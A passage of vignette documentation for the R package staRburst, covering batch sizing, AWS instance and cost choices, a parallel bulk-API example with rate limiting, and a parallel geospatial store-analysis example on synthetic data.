batches <- split(1:10000, ceiling(seq_along(1:10000) / 100))
starburst_map(batches, function(batch) lapply(batch, quick_fn), workers = 100)
```

**Batch size formula:**

```{r batch-size}
# Profile your function first
per_item_time <- 0.5   # seconds, from local profiling
target_task_duration <- 60  # aim for 60s minimum per task

batch_size <- ceiling(target_task_duration / per_item_time)
# Result: 120 items per batch
```

---

## Choosing Instance Types

The **default** instance type is `c7g.xlarge` (Graviton, ARM64) — provisioned
automatically by `starburst_setup()`. The types below are strong alternatives:

| Instance | Architecture | Price/Perf | Best For |
|----------|-------------|------------|----------|
| **c8a** | AMD 8th gen | ★★★★★ | Recommended — best overall price/perf |
| **c8g** | Graviton4 ARM | ★★★★ | Best ARM64 option |
| **c7a** | AMD 7th gen | ★★★★ | Proven, stable |
| **c8i** | Intel 8th gen | ★★★ | High single-thread needs |

> **Custom instance types provision on first use.** `starburst_setup()` provisions
> only the default (`c7g.xlarge`). The first time you use a *different* type,
> staRburst automatically creates its capacity provider (a one-time ~1–2 min step,
> no instances launched by provisioning). To pre-provision explicitly, run
> `starburst_setup_ec2(instance_types = "c8a.xlarge")` once.

```{r instance-choice}
# Recommended alternative: c8a with spot instances (auto-provisioned on first use)
plan(starburst,
  workers     = 50,
  instance_type = "c8a.xlarge",  # AMD 8th gen — best price/performance
  use_spot    = TRUE             # 70% cheaper than on-demand
)
```

**Spot vs on-demand (50 workers, us-east-1):**

```
c8a on-demand:  $7.20/hr
c8a spot:       $2.16/hr   ← 70% savings, low interruption risk
```

---

## The Startup Cost Problem

Workers need ~75–90 s to start cold (pool warmup + image pull + environment sync).
This cost is **fixed** — it doesn't scale with job size. The key is to amortize it.
The numbers below extrapolate from the measured "heavy" run above (5.3 min local vs
~90 s startup + ~38 s compute on 30 workers).

### Run once (cold) — modest win

```
Local (sequential):        5.3 min, $0
Cloud 30 workers (cold):   2.1 min ($0.06)   [87s startup + 38s compute]
  → ~2.5x faster, laptop freed — worth it, but startup is most of the cloud time
```

### Run 10 times (parameter sweep) — much better

```
Local (sequential):        53 min (10 × 5.3), laptop tied up
Cloud (pool stays warm):   ~8 min (90s startup ONCE + 10 × ~38s compute)
  → Startup paid once, then each run is ~38s. Big win, laptop stays usable.
```

### Daily recurring job — excellent

```
Warm pool started once in the morning; every run pays ~0 startup.
  → Per-run cost is just compute+collect (~38s here); startup overhead ≈ 0%.
  → Best case for staRburst — see the "keep warm pool" pattern below.
```

---

## Decision Framework

The real question isn't total job length — it's **per-task work vs. the ~90 s cold
startup**, and **how many times you'll run it**. The measured examples above bracket it:
the heavy workload won at ~5 min of sequential work; the trivial one lost badly. As a
rule of thumb for a **single cold run**:

```
Per-task work is sub-second:   Stay local (startup is pure overhead)
Tasks are seconds–minutes,
  and there are many:          Cloud wins — this is the sweet spot
Total sequential work < ~2 min: Local usually wins on a cold start
```

Running it **more than once** changes everything — a warm pool pays the ~90 s startup
once, so even modest jobs win on the 2nd+ run (see below).

**How many times will you run it?**
```
Once:          Startup is ~20% of job time
2–5 times:     Startup amortizes to ~5–10%
10+ times:     Startup < 2%
Daily:         Keep warm pool, effectively zero
```

**What's your local hardware?**
```
4–6 cores:         Cloud dominates
8–10 cores (M4):   Cloud wins but it's closer
16+ cores:         Cloud might not win on speed
HPC cluster:       Use your cluster
```

---

## Common Patterns

### Pattern: One-shot analysis — use local

```{r one-shot-local}
library(parallel)
cl <- makeCluster(detectCores() - 1)
results <- parLapply(cl, data, your_function)
stopCluster(cl)
```

### Pattern: Parameter sweep — use cloud

```{r param-sweep}
# Pay startup cost once, run many combinations
for (alpha in seq(0.1, 1.0, 0.1)) {
  for (beta in seq(0.1, 1.0, 0.1)) {
    results <- starburst_map(
      data,
      function(x) model(x, alpha = alpha, beta = beta),
      workers = 50
    )
  }
}
```

### Pattern: Daily production job — keep warm pool

```{r warm-pool}
# Start warm pool once in the morning
plan(starburst, workers = 50, warm_pool_timeout = 28800)  # 8 hours

# All runs during the day start in < 30s
results_am <- starburst_map(morning_data, process)
results_pm <- starburst_map(afternoon_data, process)
# Pool shuts down automatically after 8 hours of inactivity
```

### Pattern: Hybrid — develop local, scale on cloud

```{r hybrid}
# Iterate quickly on a small sample locally
results_test <- lapply(data[1:100], your_function)

# When logic is right, scale to full dataset on cloud
results_full <- starburst_map(data, your_function, workers = 100)
```

---

## Cost Estimation

**Quick formula (EC2 spot, us-east-1):**

```
Cost ≈ workers × hours × $0.044/worker/hour
```

| Job size | Workers | Wall time | Spot cost |
|----------|---------|-----------|-----------|
| Small (1 hr sequential)  | 10  | ~6 min  | ~$0.04 |
| Medium (5 hr sequential) | 25  | ~12 min | ~$0.22 |
| Large (10 hr sequential) | 50  | ~25 min | ~$0.92 |

Use `starburst_estimate()` for a precise estimate before running.

---

## Common Pitfalls

**Too many small tasks:**
```{r pitfall-small}
# Bad: each task is 0.1s — overhead is 20-30x the work
starburst_map(1:10000, function(x) sqrt(x), workers = 100)

# Good: batch into groups of 100
batches <- split(1:10000, ceiling(seq_along(1:10000) / 100))
starburst_map(batches, function(b) sapply(b, sqrt), workers = 100)
```

**More workers than tasks:**
```{r pitfall-workers}
# Bad: 40 workers sit idle
starburst_map(1:10, fn, workers = 50)

# Good: match workers to workload
starburst_map(1:100, fn, workers = 25)  # 4 tasks per worker
```

**Sending large data to every worker:**
```{r pitfall-data}
# Bad: huge_matrix serialized and sent to each of 50 workers
huge_matrix <- matrix(rnorm(1e8), ncol = 1000)
starburst_map(1:50, function(i) process(huge_matrix, i), workers = 50)

# Good: generate data inside the worker
starburst_map(1:50, function(i) {
  data <- generate_chunk(i)  # create data on the worker
  process(data)
}, workers = 50)
```

---

## Use Case Quick Reference

| Use Case | Task Duration | Batch Size | Workers | Expected Speedup |
|----------|--------------|------------|---------|------------------|
| Fast calculations | 0.001s | 1000+ per task | 20–50 | 3–8x |
| API calls | 0.5–2s | 20–100 per task | 20–50 | 8–15x |
| Data processing | 10–60s | 5–20 per task | 20–50 | 12–20x |
| Report generation | 60–300s | 1–5 per task | 20–50 | 15–25x |
| Model training | 2–10 min | 1–2 per task | 20–50 | 18–30x |

---

## AWS Authentication

staRburst uses the [paws](https://github.com/paws-r/paws) AWS SDK, which supports
the full AWS credential chain:

- **Environment variables**: `AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY`, `AWS_SESSION_TOKEN`
- **Named profiles**: set `AWS_PROFILE=myprofile` to select a profile from `~/.aws/credentials`
- **AWS SSO / `aws login`**: supported via named profiles configured with SSO in `~/.aws/config` (requires AWS CLI v2, `aws login` available since November 2025)
- **IAM instance roles**: automatic when running on EC2 or ECS

```bash
# Standard profile
export AWS_PROFILE=my-aws-account
Rscript -e "library(starburst); starburst_setup_ec2()"

# SSO profile (AWS CLI v2)
aws login --profile my-sso-profile
export AWS_PROFILE=my-sso-profile
Rscript -e "library(starburst); starburst_setup_ec2()"
```

No explicit configuration is required in staRburst — it defers entirely to paws credential discovery.

---
title: "Example: Parallel Bulk API Calls"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Example: Parallel Bulk API Calls}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

## Overview

Making hundreds or thousands of API calls is a common bottleneck in data pipelines. This example demonstrates parallelizing REST API calls to fetch data from multiple endpoints.

**Use Case**: Data enrichment, web scraping, external data integration, geocoding

**Computational Pattern**: I/O-bound parallel processing with rate limiting

## The Problem

You need to enrich a dataset of 1,000 companies with external data from a REST API:
- Company financial metrics
- Stock prices
- News sentiment
- ESG scores

Each API call takes 0.5-2 seconds due to network latency. Sequential execution would take 8-30 minutes.

## Setup

```{r setup, eval=FALSE}
library(starburst)
library(httr)
library(jsonlite)
```

## API Call Function

Define a function that fetches data for one company:

```{r api-function, eval=FALSE}
fetch_company_data <- function(ticker) {
  # Add small delay to respect rate limits
  Sys.sleep(runif(1, 0.1, 0.3))

  # For demo purposes, we'll use a public API
  # In practice, replace with your actual API endpoint
  base_url <- "https://api.example.com/company"

  tryCatch({
    # Fetch company info
    response <- httr::GET(
      paste0(base_url, "/", ticker),
      httr::timeout(10),
      httr::add_headers(
        "User-Agent" = "staRburst-example/1.0"
      )
    )

    # Check for success
    if (httr::status_code(response) == 200) {
      data <- httr::content(response, "parsed")

      # Extract relevant fields
      list(
        ticker = ticker,
        success = TRUE,
        company_name = data$name %||% NA,
        market_cap = data$marketCap %||% NA,
        pe_ratio = data$peRatio %||% NA,
        revenue = data$revenue %||% NA,
        employees = data$employees %||% NA,
        sector = data$sector %||% NA,
        timestamp = Sys.time()
      )
    } else {
      # Handle API errors
      list(
        ticker = ticker,
        success = FALSE,
        error = paste("HTTP", httr::status_code(response)),
        timestamp = Sys.time()
      )
    }
  }, error = function(e) {
    # Handle network errors
    list(
      ticker = ticker,
      success = FALSE,
      error = as.character(e),
      timestamp = Sys.time()
    )
  })
}

# Helper: null-coalescing operator
`%||%` <- function(x, y) if (is.null(x)) y else x
```

## Mock API for Demo

Since we need a real API for testing, let's create a mock function that simulates API behavior:

```{r mock-api, eval=FALSE}
# Mock function that simulates API with realistic delays
fetch_company_data_mock <- function(ticker) {
  # Simulate network latency
  Sys.sleep(runif(1, 0.2, 0.8))

  # Simulate occasional failures (5% rate)
  if (runif(1) < 0.05) {
    return(list(
      ticker = ticker,
      success = FALSE,
      error = "API timeout",
      timestamp = Sys.time()
    ))
  }

  # Generate mock data
  list(
    ticker = ticker,
    success = TRUE,
    company_name = paste("Company", ticker),
    market_cap = round(rnorm(1, 50e9, 20e9), 0),
    pe_ratio = round(rnorm(1, 25, 10), 2),
    revenue = round(rnorm(1, 10e9, 5e9), 0),
    employees = round(rnorm(1, 50000, 20000), 0),
    sector = sample(c("Technology", "Healthcare", "Finance", "Energy"), 1),
    timestamp = Sys.time()
  )
}
```

## Generate Sample Data

Create a list of 1,000 company tickers:

```{r sample-data, eval=FALSE}
# Generate mock ticker symbols
set.seed(123)
n_companies <- 1000
tickers <- paste0(
  sample(LETTERS, n_companies, replace = TRUE),
  sample(LETTERS, n_companies, replace = TRUE),
  sample(LETTERS, n_companies, replace = TRUE)
)

head(tickers)
# [1] "NAL" "RPL" "OQM" "TYW" "AIT" "UMD"
```

## Local Execution

Run sequentially on local machine:

```{r local, eval=FALSE}
cat(sprintf("Fetching data for %d companies locally...\n", length(tickers)))

local_start <- Sys.time()
local_results <- lapply(head(tickers, 50), fetch_company_data_mock)
local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("[OK] Completed 50 calls in %.1f seconds\n", local_time))
cat(sprintf("  Estimated time for %d: %.1f minutes\n",
            n_companies, local_time * n_companies / 50 / 60))
```

**Illustrative output**:
```
Fetching data for 1000 companies locally...
[OK] Completed 50 calls in 24.3 seconds
  Estimated time for 1000: 8.1 minutes
```

## Cloud Execution with staRburst

Run all 1,000 API calls in parallel:

Each fetch is short, so submitting 1,000 one-call tasks would be dominated by
per-task S3 overhead (see the
[Workload Shapes](https://starburst.ing/articles/workload-shapes.html) guide).
Instead, batch the tickers into ~100 tasks and have each task fetch its chunk:

```{r cloud, eval=FALSE}
cat(sprintf("Fetching data for %d companies on AWS...\n", n_companies))

# ~100 tasks, each fetching a chunk of tickers
batches <- split(tickers, ceiling(seq_along(tickers) / ceiling(length(tickers) / 100)))
results <- starburst_map(
  batches,
  function(batch) lapply(batch, fetch_company_data_mock),
  workers = 25,
  cpu = 1,
  memory = "2GB"
)
results <- unlist(results, recursive = FALSE)  # flatten to 1,000 results
```

**Illustrative output** (times/cost vary — see the Workload Shapes and Performance
guides for measured numbers):
```
[Starting] Starting starburst cluster with 25 workers
[Status] Processing 100 items with 25 workers
[Starting] Submitting 100 tasks...
[Wait] Progress: 100/100
[OK] Completed
[Cost] Estimated cost: (printed per run)
```

## Results Processing

Analyze the fetched data:

```{r analysis, eval=FALSE}
# Convert results to data frame
results_df <- do.call(rbind, lapply(results, function(x) {
  if (x$success) {
    data.frame(
      ticker = x$ticker,
      company_name = x$company_name,
      market_cap = x$market_cap,
      pe_ratio = x$pe_ratio,
      revenue = x$revenue,
      employees = x$employees,
      sector = x$sector,
      success = TRUE,
      error = NA,
      stringsAsFactors = FALSE
    )
  } else {
    data.frame(
      ticker = x$ticker,
      company_name = NA,
      market_cap = NA,
      pe_ratio = NA,
      revenue = NA,
      employees = NA,
      sector = NA,
      success = FALSE,
      error = x$error,
      stringsAsFactors = FALSE
    )
  }
}))

# Summary
success_rate <- mean(results_df$success) * 100
cat(sprintf("\n=== Results Summary ===\n"))
cat(sprintf("Total companies: %d\n", nrow(results_df)))
cat(sprintf("Successful fetches: %d (%.1f%%)\n",
            sum(results_df$success), success_rate))
cat(sprintf("Failed fetches: %d\n", sum(!results_df$success)))

# Show sample of results
cat("\n=== Sample Results ===\n")
print(head(results_df[results_df$success, ], 10))

# Sector distribution
cat("\n=== Sector Distribution ===\n")
print(table(results_df$sector))

# Market cap summary
cat("\n=== Market Cap Summary ===\n")
cat(sprintf("Mean: $%.2fB\n",
            mean(results_df$market_cap, na.rm = TRUE) / 1e9))
cat(sprintf("Median: $%.2fB\n",
            median(results_df$market_cap, na.rm = TRUE) / 1e9))
cat(sprintf("Range: $%.2fB - $%.2fB\n",
            min(results_df$market_cap, na.rm = TRUE) / 1e9,
            max(results_df$market_cap, na.rm = TRUE) / 1e9))
```

## Performance

For measured performance and when bursting is worth it, see
`vignette("performance")` and `vignette("workload-shapes")`.

## Rate Limiting Considerations

When working with real APIs:

Each worker throttles itself **independently**, so the *aggregate* rate is the
per-worker rate times the number of workers. To respect a global API limit, give
each worker its share: `per_worker_rate = global_limit / workers`.

```{r rate-limiting, eval=FALSE}
# per_worker_rate is calls/minute allowed to THIS worker
fetch_with_rate_limit <- function(ticker, per_worker_rate) {
  delay <- 60 / per_worker_rate + runif(1, 0, 0.1)
  Sys.sleep(delay)
  fetch_company_data(ticker)
}

global_limit <- 100   # API allows 100 calls/minute total
workers      <- 10
per_worker   <- global_limit / workers   # 10 calls/min each

results <- starburst_map(
  tickers,
  function(x) fetch_with_rate_limit(x, per_worker_rate = per_worker),
  workers = workers
)
```

**Rate limit calculation**:
- API limit: 100 calls/minute (global)
- Workers: 10 → each worker allowed 100 / 10 = 10 calls/minute
- Aggregate throughput: 10 workers × 10 calls/min = **100 calls/minute** (at the limit)
- Rule: `per_worker_rate = global_limit / workers` keeps the fleet under the cap

## Error Handling Best Practices

```{r error-handling, eval=FALSE}
fetch_with_retry <- function(ticker, max_retries = 3) {
  for (attempt in 1:max_retries) {
    result <- fetch_company_data(ticker)

    if (result$success) {
      return(result)
    }

    # Exponential backoff
    if (attempt < max_retries) {
      Sys.sleep(2^attempt + runif(1, 0, 1))
    }
  }

  # Return failure after all retries
  result$error <- paste("Failed after", max_retries, "retries:", result$error)
  return(result)
}
```

## When to Use This Pattern

**Good fit**:
- Many independent API calls (> 100)
- Each call takes > 0.5 seconds
- API allows concurrent requests
- Transient failures are acceptable

**Not ideal**:
- Strict rate limits (< 10 calls/second total)
- APIs that block concurrent requests
- Very fast APIs (< 0.1 seconds per call)

## Running the Full Example

The complete runnable script is available at:
```{r, eval=FALSE}
system.file("examples/api-calls.R", package = "starburst")
```

Run it with:
```{r, eval=FALSE}
source(system.file("examples/api-calls.R", package = "starburst"))
```

## Next Steps

- Replace mock function with your actual API
- Implement proper authentication (API keys, OAuth)
- Add request caching to avoid redundant calls
- Monitor API usage and costs
- Implement more sophisticated retry logic

**Related examples**:
- [Report Generation](example-reports.html) - Another I/O-bound parallel task
- [Feature Engineering](example-feature-engineering.html) - Data enrichment patterns

---
title: "Example: Parallel Geospatial Analysis"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Example: Parallel Geospatial Analysis}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

## Overview

Geospatial analysis often involves computationally expensive operations like distance calculations, spatial joins, and geometric operations across large datasets. This example demonstrates parallelizing spatial analysis across geographic regions.

**Use Case**: Store location optimization, delivery route planning, spatial market analysis, environmental modeling

**Computational Pattern**: Spatial data parallelism with region-based chunking

## The Problem

You need to analyze 100 retail locations across 20 metropolitan areas to:
- Calculate distances to competitors
- Identify optimal delivery zones
- Compute demographic coverage
- Analyze spatial clustering
- Generate market penetration metrics

Each region can be analyzed independently, making this ideal for parallel processing.

## Setup

```{r setup, eval=FALSE}
library(starburst)
```

## Generate Sample Data

Create synthetic geospatial data:

```{r data, eval=FALSE}
set.seed(789)

# Define 20 metropolitan regions (simplified coordinates)
regions <- data.frame(
  region_id = 1:20,
  region_name = c("New York", "Los Angeles", "Chicago", "Houston", "Phoenix",
                 "Philadelphia", "San Antonio", "San Diego", "Dallas", "San Jose",
                 "Austin", "Jacksonville", "Fort Worth", "Columbus", "Charlotte",
                 "San Francisco", "Indianapolis", "Seattle", "Denver", "Boston"),
  center_lat = c(40.71, 34.05, 41.88, 29.76, 33.45,
                39.95, 29.42, 32.72, 32.78, 37.34,
                30.27, 30.33, 32.75, 39.96, 35.23,
                37.77, 39.77, 47.61, 39.74, 42.36),
  center_lon = c(-74.01, -118.24, -87.63, -95.37, -112.07,
                -75.17, -98.49, -117.16, -96.80, -121.89,
                -97.74, -81.66, -97.33, -83.00, -80.84,
                -122.42, -86.16, -122.33, -104.99, -71.06),
  stringsAsFactors = FALSE
)

# Generate store locations (5 per region)
stores <- do.call(rbind, lapply(1:nrow(regions), function(i) {
  n_stores <- 5
  # Add random offset to region center
  data.frame(
    store_id = (i - 1) * n_stores + 1:n_stores,
    region_id = regions$region_id[i],
    region_name = regions$region_name[i],
    latitude = regions$center_lat[i] + rnorm(n_stores, 0, 0.1),
    longitude = regions$center_lon[i] + rnorm(n_stores, 0, 0.1),
    annual_revenue = rlnorm(n_stores, log(1000000), 0.5),
    stringsAsFactors = FALSE
  )
}))

# Generate competitor locations (10 per region)
competitors <- do.call(rbind, lapply(1:nrow(regions), function(i) {
  n_competitors <- 10
  data.frame(
    competitor_id = (i - 1) * n_competitors + 1:n_competitors,
    region_id = regions$region_id[i],
    latitude = regions$center_lat[i] + rnorm(n_competitors, 0, 0.15),
    longitude = regions$center_lon[i] + rnorm(n_competitors, 0, 0.15),
    stringsAsFactors = FALSE
  )
}))

# Generate customer points (1000 per region)
customers <- do.call(rbind, lapply(1:nrow(regions), function(i) {
  n_customers <- 1000
  data.frame(
    customer_id = (i - 1) * n_customers + 1:n_customers,
    region_id = regions$region_id[i],
    latitude = regions$center_lat[i] + rnorm(n_customers, 0, 0.2),
    longitude = regions$center_lon[i] + rnorm(n_customers, 0, 0.2),
    annual_spend = rlnorm(n_customers, log(500), 0.8),
    stringsAsFactors = FALSE
  )
}))

cat(sprintf("Dataset created:\n"))
cat(sprintf("  %d stores across %d regions\n", nrow(stores), nrow(regions)))
cat(sprintf("  %s competitors\n", format(nrow(competitors), big.mark = ",")))
cat(sprintf("  %s customers\n", format(nrow(customers), big.mark = ",")))
```

**Output**:
```
Dataset created:
  100 stores across 20 regions
  200 competitors
  20,000 customers
```

## Spatial Analysis Function

Define a function that performs spatial analysis for a region:

```{r spatial-fn, eval=FALSE}
# Haversine distance function (in km)
haversine_distance <- function(lat1, lon1, lat2, lon2) {
  R <- 6371  # Earth's radius in km

  lat1_rad <- lat1 * pi / 180
  lat2_rad <- lat2 * pi / 180
  delta_lat <- (lat2 - lat1) * pi / 180
  delta_lon <- (lon2 - lon1) * pi / 180

  a <- sin(delta_lat/2)^2 +
       cos(lat1_rad) * cos(lat2_rad) * sin(delta_lon/2)^2
  c <- 2 * atan2(sqrt(a), sqrt(1-a))

  R * c
}

analyze_region <- function(region_id, stores_data, competitors_data,
                          customers_data) {
  # Filter data for this region
  region_stores <- stores_data[stores_data$region_id == region_id, ]
  region_competitors <- competitors_data[competitors_data$region_id == region_id, ]
  region_customers <- customers_data[customers_data$region_id == region_id, ]

  if (nrow(region_stores) == 0) {
    return(NULL)
  }

  # Analyze each store
  store_metrics <- lapply(1:nrow(region_stores), function(i) {
    store <- region_stores[i, ]

    # Distance to nearest competitor
    competitor_distances <- sapply(1:nrow(region_competitors), function(j) {
      haversine_distance(
        store$latitude, store$longitude,
        region_competitors$latitude[j], region_competitors$longitude[j]
      )
    })
    nearest_competitor_km <- min(competitor_distances)
    avg_competitor_distance <- mean(competitor_distances)
    competitors_within_5km <- sum(competitor_distances <= 5)

    # Customer coverage analysis
    customer_distances <- sapply(1:nrow(region_customers), function(j) {
      haversine_distance(
        store$latitude, store$longitude,
        region_customers$latitude[j], region_customers$longitude[j]
      )
    })

    # Customers within radius
    customers_1km <- sum(customer_distances <= 1)
    customers_3km <- sum(customer_distances <= 3)
    customers_5km <- sum(customer_distances <= 5)
    customers_10km <- sum(customer_distances <= 10)

    # Market potential (customers within 5km)
    nearby_customers <- region_customers[customer_distances <= 5, ]
    market_potential <- if (nrow(nearby_customers) > 0) {
      sum(nearby_customers$annual_spend)
    } else {
      0
    }

    # Average distance to customers
    avg_customer_distance <- mean(customer_distances)
    median_customer_distance <- median(customer_distances)

    # Spatial density (customers per km² within 10km radius)
    area_10km <- pi * 10^2  # ~314 km²
    customer_density <- customers_10km / area_10km

    # Competitive intensity score (0-1, higher = more competitive)
    competitive_intensity <- min(1, competitors_within_5km / 10)

    data.frame(
      store_id = store$store_id,
      region_id = region_id,
      region_name = store$region_name,
      annual_revenue = store$annual_revenue,
      nearest_competitor_km = nearest_competitor_km,
      avg_competitor_distance = avg_competitor_distance,
      competitors_within_5km = competitors_within_5km,
      customers_1km = customers_1km,
      customers_3km = customers_3km,
      customers_5km = customers_5km,
      customers_10km = customers_10km,
      market_potential = market_potential,
      avg_customer_distance = avg_customer_distance,
      median_customer_distance = median_customer_distance,
      customer_density = customer_density,
      competitive_intensity = competitive_intensity,
      stringsAsFactors = FALSE
    )
  })

  do.call(rbind, store_metrics)
}
```

## Local Execution

Test spatial analysis locally on a subset of regions:

```{r local, eval=FALSE}
# Analyze 3 regions locally
test_regions <- c(1, 2, 3)

cat(sprintf("Analyzing %d regions locally...\n", length(test_regions)))
local_start <- Sys.time()

local_results <- lapply(test_regions, analyze_region,
                       stores_data = stores,
                       competitors_data = competitors,
                       customers_data = customers)
local_metrics <- do.call(rbind, local_results)

local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("[OK] Completed in %.2f seconds\n", local_time))
cat(sprintf("  Processed %d stores\n", nrow(local_metrics)))
cat(sprintf("  Estimated time for all %d regions: %.1f seconds\n",
            nrow(regions), local_time * (nrow(regions) / length(test_regions))))
```

**Illustrative output**:
```
Analyzing 3 regions locally...
[OK] Completed in 4.5 seconds
  Processed 15 stores
  Estimated time for all 20 regions: 30.0 seconds
```

For all 20 regions locally: **~30 seconds**

## Cloud Execution with staRburst

Analyze all regions in parallel on AWS:

```{r cloud, eval=FALSE}
n_workers <- 20

cat(sprintf("Analyzing %d regions on %d workers...\n", nrow(regions), n_workers))

cloud_start <- Sys.time()

results <- starburst_map(
  regions$region_id,
  analyze_region,
  stores_data = stores,
  competitors_data = competitors,
  customers_data = customers,
  workers = n_workers,
  cpu = 2,
  memory = "4GB"
)

cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))

cat(sprintf("\n[OK] Completed in %.1f seconds\n", cloud_time))

# Combine results
spatial_metrics <- do.call(rbind, results)
```

**Illustrative output**:
```
[Starting] Starting starburst cluster with 20 workers
[Status] Processing 20 items with 20 workers
[Starting] Submitting 20 tasks...
[Wait] Progress: 20/20 (4.8s)
[OK] Completed in 4.8 seconds
[Cost] Estimated cost: $0.002
```

## Results Analysis

Analyze the spatial metrics:

```{r analysis, eval=FALSE}
cat("\n=== Geospatial Analysis Results ===\n\n")
cat(sprintf("Total stores analyzed: %d\n", nrow(spatial_metrics)))
cat(sprintf("Regions covered: %d\n\n", length(unique(spatial_metrics$region_id))))

# Competition metrics
cat("=== Competition Analysis ===\n")
cat(sprintf("Average distance to nearest competitor: %.2f km\n",
            mean(spatial_metrics$nearest_competitor_km)))
cat(sprintf("Median distance to nearest competitor: %.2f km\n",
            median(spatial_metrics$nearest_competitor_km)))
cat(sprintf("Average competitors within 5km: %.1f\n",
            mean(spatial_metrics$competitors_within_5km)))
cat(sprintf("Stores with high competition (5+ competitors within 5km): %d (%.1f%%)\n\n",
            sum(spatial_metrics$competitors_within_5km >= 5),
            mean(spatial_metrics$competitors_within_5km >= 5) * 100))

# Customer coverage
cat("=== Customer Coverage Analysis ===\n")
cat(sprintf("Average customers within 5km: %.0f\n",
            mean(spatial_metrics$customers_5km)))
cat(sprintf("Average market potential (5km radius): $%.0f\n",
            mean(spatial_metrics$market_potential)))
cat(sprintf("Average customer density: %.1f customers/km²\n",
            mean(spatial_metrics$customer_density)))
cat(sprintf("Median distance to customers: %.2f km\n\n",
            mean(spatial_metrics$median_customer_distance)))

# Store performance correlation
cat("=== Performance Insights ===\n")
correlation <- cor(spatial_metrics$annual_revenue,
                   spatial_metrics$market_potential)
cat(sprintf("Correlation (revenue vs market potential): %.3f\n", correlation))

# Identify opportunity stores
opportunity_stores <- spatial_metrics[
  spatial_metrics$market_potential > median(spatial_metrics$market_potential) &
  spatial_metrics$competitors_within_5km < median(spatial_metrics$competitors_within_5km),
]
cat(sprintf("\nHigh opportunity stores (low competition, high potential): %d\n",
            nrow(opportunity_stores)))
if (nrow(opportunity_stores) > 0) {
  cat(sprintf("  Average market potential: $%.0f\n",
              mean(opportunity_stores$market_potential)))
  cat(sprintf("  Average competitors nearby: %.1f\n",
              mean(opportunity_stores$competitors_within_5km)))
}

# Identify challenged stores
challenged_stores <- spatial_metrics[
  spatial_metrics$competitive_intensity > 0.7 &
  spatial_metrics$market_potential < median(spatial_metrics$market_potential),
]
cat(sprintf("\nChallenged stores (high competition, low potential): %d\n",
            nrow(challenged_stores)))
if (nrow(challenged_stores) > 0) {
  cat(sprintf("  Average market potential: $%.0f\n",
              mean(challenged_stores$market_potential)))
  cat(sprintf("  Average competitors nearby: %.1f\n",
              mean(challenged_stores$competitors_within_5km)))
}

# Top regions by market potential
cat("\n=== Top 5 Regions by Market Potential ===\n")
region_summary <- aggregate(market_potential ~ region_name,
                           data = spatial_metrics, FUN = mean)
region_summary <- region_summary[order(-region_summary$market_potential), ]
for (i in 1:min(5, nrow(region_summary))) {
  cat(sprintf("%d. %s: $%.0f\n", i,
              region_summary$region_name[i],
              region_summary$market_potential[i]))
}
```

**Illustrative output**:
```
=== Geospatial Analysis Results ===

Total stores analyzed: 100
Regions covered: 20

=== Competition Analysis ===
Average distance to nearest competitor: 2.34 km
Median distance to nearest competitor: 2.18 km
Average competitors within 5km: 6.2
Stores with high competition (5+ competitors within 5km): 58 (58.0%)

=== Customer Coverage Analysis ===
Average customers within 5km: 512
Average market potential (5km radius): $256,345
Average customer density: 3.2 customers/km²
Median distance to customers: 4.12 km

=== Performance Insights ===
Correlation (revenue vs market potential): 0.423

High opportunity stores (low competition, high potential): 12
  Average market potential: $342,567
  Average competitors nearby: 3.2

Challenged stores (high competition, low potential): 8
  Average market potential: $178,234
  Average competitors nearby: 8.4

=== Top 5 Regions by Market Potential ===
1. New York: $298,456
2. Los Angeles: $287,234
3. Chicago: $276,890
4. San Francisco: $265,123
5. Boston: $258,901
```

## Performance Comparison

These are **real measured numbers** from `bench/benchmark.R` (see `bench/README.md`),
not illustrations — a cold run of 20 per-region terrain tasks on live AWS:

| Phase | Time | Notes |
|-------|------|-------|
| Local (sequential) | 0.1 s | 20 tasks on an Apple M4 Pro (12-core) — this workload is tiny |
| Cloud: startup | 74.7 s | one-time: worker provision + image pull |
| Cloud: compute + collect | 27.9 s | submit → run on 20 workers → collect |
| **Cloud total (cold)** | **102.6 s** | startup + compute+collect |
| Est. cost | $0.03 | 20× c7i.xlarge Spot |

*(staRburst 0.3.9, us-east-1, EC2 c7i.xlarge Spot, 20 workers, cold start; sequential
baseline on an Apple M4 Pro (Mac16,11, 12-core, 48 GB, R 4.6.1), 2026-07-21.)*

> **This is the honest result, and it's a "don't burst this" case.** The cloud total
> (102.6 s) is far *slower* than local (0.1 s): the workload is seconds of compute, so
> the ~75 s of fixed startup dominates and there is nothing to amortize it against.
> Cloud bursting wins only when per-task work is **minutes** and there are many tasks
> — then compute+collect dwarfs startup. This example exists to show the mechanics;
> see `vignette("performance")` for when the cloud actually pays off. Regenerate this
> table for your own workload/region with `bench/benchmark.R`.

**Key Insights**:
- Excellent parallelization for spatial operations once workers are warm
- Near-linear scaling across regions
- Minimal per-task cost even with complex calculations
- Scales to 100+ regions, where startup overhead is amortized away

## Advanced: Delivery Zone Optimization

Extend to compute optimal delivery zones:

```{r zones, eval=FALSE}
optimize_delivery_zones <- function(region_id, stores_data, customers_data) {
  region_stores <- stores_data[stores_data$region_id == region_id, ]
  region_customers <- customers_data[customers_data$region_id == region_id, ]

  # Assign each customer to nearest store
  customer_assignments <- lapply(1:nrow(region_customers), function(i) {
    customer <- region_customers[i, ]

    distances <- sapply(1:nrow(region_stores), function(j) {
      haversine_distance(
        customer$latitude, customer$longitude,
        region_stores$latitude[j], region_stores$longitude[j]
      )
    })

    nearest_store <- which.min(distances)

    list(
      customer_id = customer$customer_id,
      assigned_store = region_stores$store_id[nearest_store],
      distance_km = distances[nearest_store],
      annual_spend = customer$annual_spend
    )
  })

  # Aggregate by store
  assignments_df <- do.call(rbind, lapply(customer_assignments, as.data.frame))

  store_zones <- aggregate(
    cbind(customer_count = customer_id,
          total_revenue = annual_spend,
          avg_distance = distance_km) ~ assigned_store,
    data = assignments_df,
